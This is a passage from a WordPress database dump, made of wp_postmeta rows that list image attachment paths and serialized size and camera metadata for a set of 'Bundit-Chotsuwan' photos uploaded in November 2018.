(9838, 4440, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:35:\"2018/11/9-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"9-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"9-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"9-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"9-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:35:\"9-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477136883\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9839, 4441, '_wp_attached_file', '2018/11/26-Bundit-Chotsuwan-copy.jpg'),
(9840, 4441, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/26-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"26-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"26-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"26-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"26-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"26-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477119298\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9841, 4442, '_wp_attached_file', '2018/11/28-Bundit-Chotsuwan-copy.jpg'),
(9842, 4442, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/28-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"28-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"28-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"28-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"28-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"28-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480439764\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9843, 4443, '_wp_attached_file', '2018/11/29-Bundit-Chotsuwan-copy.jpg'),
(9844, 4443, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/29-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"29-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"29-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"29-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"29-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"29-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477653210\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9845, 4444, '_wp_attached_file', '2018/11/30-Bundit-Chotsuwan-copy.jpg'),
(9846, 4444, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/30-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"30-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"30-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"30-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"30-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"30-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476463776\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"170\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9847, 4445, '_wp_attached_file', '2018/11/34-Bundit-Chotsuwan-copy.jpg'),
(9848, 4445, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1155;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/34-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"34-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"34-Bundit-Chotsuwan-copy-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"34-Bundit-Chotsuwan-copy-768x501.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:501;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"34-Bundit-Chotsuwan-copy-1024x668.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:668;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"34-Bundit-Chotsuwan-copy-400x261.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476463530\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9849, 4446, '_wp_attached_file', '2018/11/41-Bundit-Chotsuwan-copy.jpg'),
(9850, 4446, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/41-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"41-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"41-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"41-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"41-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"41-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483229450\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:4:\"3200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9851, 4447, '_wp_attached_file', '2018/11/44-Bundit-Chotsuwan-copy.jpg'),
(9852, 4447, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/44-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"44-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"44-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"44-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"44-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"44-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476465118\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9853, 4448, '_wp_attached_file', '2018/11/45-Bundit-Chotsuwan-copy.jpg'),
(9854, 4448, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/45-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"45-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"45-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"45-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"45-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"45-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479056593\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9855, 4449, '_wp_attached_file', '2018/11/50-Bundit-Chotsuwan-copy.jpg'),
(9856, 4449, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1196;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/50-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"50-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"50-Bundit-Chotsuwan-copy-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"50-Bundit-Chotsuwan-copy-768x484.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:484;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"50-Bundit-Chotsuwan-copy-1024x646.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"50-Bundit-Chotsuwan-copy-400x252.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478273745\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9857, 4450, '_wp_attached_file', '2018/11/53-Bundit-Chotsuwan-copy.jpg'),
(9858, 4450, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/53-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"53-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"53-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"53-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"53-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"53-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477142106\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"27\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9859, 4451, '_wp_attached_file', '2018/11/56-Bundit-Chotsuwan-copy.jpg'),
(9860, 4451, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1129;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/56-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"56-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"56-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"56-Bundit-Chotsuwan-copy-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"56-Bundit-Chotsuwan-copy-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"56-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476827047\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9861, 4452, '_wp_attached_file', '2018/11/60-Bundit-Chotsuwan-copy.jpg'),
(9862, 4452, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/60-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"60-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"60-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"60-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"60-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"60-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483229577\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:4:\"3200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9863, 4453, '_wp_attached_file', '2018/11/63-Bundit-Chotsuwan-copy.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(9864, 4453, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:36:\"2018/11/63-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"63-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"63-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"63-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"63-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"63-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1478702857\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9865, 4454, '_wp_attached_file', '2018/11/66-Bundit-Chotsuwan-copy.jpg'),
(9866, 4454, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1131;s:6:\"height\";i:754;s:4:\"file\";s:36:\"2018/11/66-Bundit-Chotsuwan-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"66-Bundit-Chotsuwan-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"66-Bundit-Chotsuwan-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"66-Bundit-Chotsuwan-copy-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"66-Bundit-Chotsuwan-copy-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"66-Bundit-Chotsuwan-copy-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark 